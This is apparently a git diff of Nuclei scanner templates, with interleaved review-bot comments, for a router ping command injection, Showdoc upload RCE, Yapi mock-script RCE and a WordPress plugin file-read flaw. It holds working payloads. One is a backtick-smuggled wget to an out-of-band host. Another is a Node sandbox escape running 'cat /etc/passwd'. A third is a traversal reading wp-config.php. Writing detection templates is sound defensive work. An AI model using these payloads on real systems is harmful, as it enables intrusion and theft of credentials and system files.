+ Origin: http://{{Hostname}}
+ Connection: keep-alive
+ Referer: http://{{Hostname}}/diag_ping_admin_en.asp
+ Upgrade-Insecure-Requests: 1
+ Host: {{Hostname}}
+ User: e8c
+ Password: e8c
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+
+ target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml
index a83e353f93..63fa6a1f77 100644
--- a/vulnerabilities/other/showdoc-file-upload-rce.yaml
+++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml
@@ -1,4 +1,5 @@
id: showdoc-file-upload-rce
+
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
@@ -20,7 +21,7 @@ requests:
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain - + ----------------------------835846770881083140190633-- - |
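Review bot: `name` says `Pre-Auth` while `description` says `an authenticated, remote attacker`, and the request carries `User: e8c` / `Password: e8c` headers that look like credentials; make the two agree and state whether those headers are required (their role is not visible here). `tags: optiLink` is mixed case while the other templates use lowercase tags (`optilink`), and the description begins with a lowercase letter (`vulnerabilities …`).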
@@ -37,11 +38,12 @@ requests:
regex:
- '/Uploads\\(.*?)"\,"success"'
- req-condition: true
+ matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - 'contains(body_2, "PHP Extension")'
- - 'contains(body_2, "PHP Version")'
- - 'status_code_2 == 200'
- condition: and
+ - type: word
+ words:
+ - '3c7cb9f46815a790686b857fdbc4295a'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml
new file mode 100644
index 0000000000..e7ad5c1b20
--- /dev/null
+++ b/vulnerabilities/other/yapi-rce.yaml
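Review bot: The new word matcher checks a bare `3c7cb9f46815a790686b857fdbc4295a` with no comment on what it is; presumably it is the md5 of a marker produced by the earlier upload request (outside this hunk), so add `# md5 of the marker echoed by the uploaded file — confirm` above it. Dropping `req-condition: true` together with the `body_2`/`status_code_2` DSL also means the matchers now run against every response in the sequence rather than the second one only; if that is intended, say so. The extractor block this hunk starts in begins outside the hunk.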
@@ -0,0 +1,110 @@
+id: yapi-rce
+
+info:
+ name: Yapi Remote Code Execution
+ author: pikpikcu
+ severity: critical
+ tags: yapi,rce
+ reference: |
+ - https://www.secpulse.com/archives/162502.html
+ - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
+ - https://twitter.com/sec715/status/1415484190561161216
+ - https://github.com/YMFE/yapi
+
+requests:
+ - raw:
+ - | # REQUEST 1
+ POST /api/user/reg HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Content-Length: 94
+ Content-Type: application/json;charset=UTF-8
+ Accept-Encoding: gzip
+
+ {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
+
+ - | # REQUEST 2
+ GET /api/group/list HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Content-Type: application/json, text/plain, */*
+ Accept-Encoding: gzip
+
+ - | # REQUEST 3
+ POST /api/project/add HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Content-Length: 106
+ Content-Type: application/json;charset=UTF-8
+ Accept-Encoding: gzip
+
+ {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"}
+
+ - | # REQUEST 4
+ GET /api/project/get?id={{project_id}} HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept-Encoding: gzip
+
+ - | # REQUEST 5
+ POST /api/interface/add HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Content-Length: 89
+ Content-Type: application/json;charset=UTF-8
+ Accept-Encoding: gzip
+
+ {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}}
+
+ - | # REQUEST 6
+ POST /api/plugin/advmock/save HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 
10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Content-Length: 382
+ Content-Type: application/json;charset=UTF-8
+ Accept-Encoding: gzip
+
+ {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}
+
+ - | # REQUEST 7
+ GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept-Encoding: gzip
+
+ cookie-reuse: true
+ extractors:
+ - type: regex
+ name: group_id
+ group: 1
+ internal: true
+ part: body
+ regex:
+ - '"_id":([0-9]+),"group_name"'
+
+ - type: regex
+ name: interface_id
+ group: 1
+ internal: true
+ part: body
+ regex:
+ - '"req_body_form":\[\],"_id":([0-9]+)'
+
+ - type: regex
+ name: project_id
+ group: 1
+ internal: true
+ part: body
+ regex:
+ - '"tag":\[\],"_id":([0-9]+)'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
new file mode 100644
index 0000000000..4091668e07
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
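Review bot: The sequence registers a new account (`/api/user/reg` with `{{randstr}}` credentials), creates a project and an interface, and saves a mock script under `/api/plugin/advmock/save`, none of which is cleaned up, so a scanned instance keeps these artifacts; `description` is missing entirely and should state that the check creates persistent objects on the target. The fixed `Content-Length` headers (94, 106, 89, 382) do not match bodies that contain variable-length `{{randstr}}` and id values; if nuclei does not recompute them for raw requests the bodies would be truncated, so confirm or drop them. The hunk begins on the previous line.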
@@ -0,0 +1,30 @@
+id: wp-memphis-documents-library-lfi
+
+info:
+ name: WordPress Plugin Memphis Document Library 3.1.5 LFI
+ author: 0x_Akoko
+ severity: high
+ tags: wordpress,wp-plugin,lfi
+ description: Arbitrary file download in Memphis Document Library 3.1.5
+ reference: |
+ - https://www.exploit-db.com/exploits/39593
+ - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
+ - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml
index c0f15c89d2..ff8f7019c7 100644
--- a/workflows/aem-workflow.yaml
+++ b/workflows/aem-workflow.yaml
@@ -7,4 +7,6 @@ info:
tags: workflow
workflows:
- - template: misconfiguration/aem/
\ No newline at end of file
+ - template: technologies/aem-detection.yaml
+ subtemplates:
+ - tags: aem
\ No newline at end of file
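Review bot: `name` and `tags` say LFI while `description` says `Arbitrary file download`, and the description has no trailing period; align them, e.g. `description: Arbitrary file download via the mdocs-img-preview parameter in Memphis Document Library 3.1.5.` — hedged, as the parameter's role is inferred from the request path.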
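Review bot: Gating every `aem`-tagged template on `technologies/aem-detection.yaml`, a favicon-hash check, means hosts whose AEM login favicon is customized, missing or served from another path will no longer run the misconfiguration checks this workflow previously ran unconditionally; if that trade-off is intended, record it in the workflow's `info` description so the reduced coverage is visible. The workflow's `info` block starts outside the hunk.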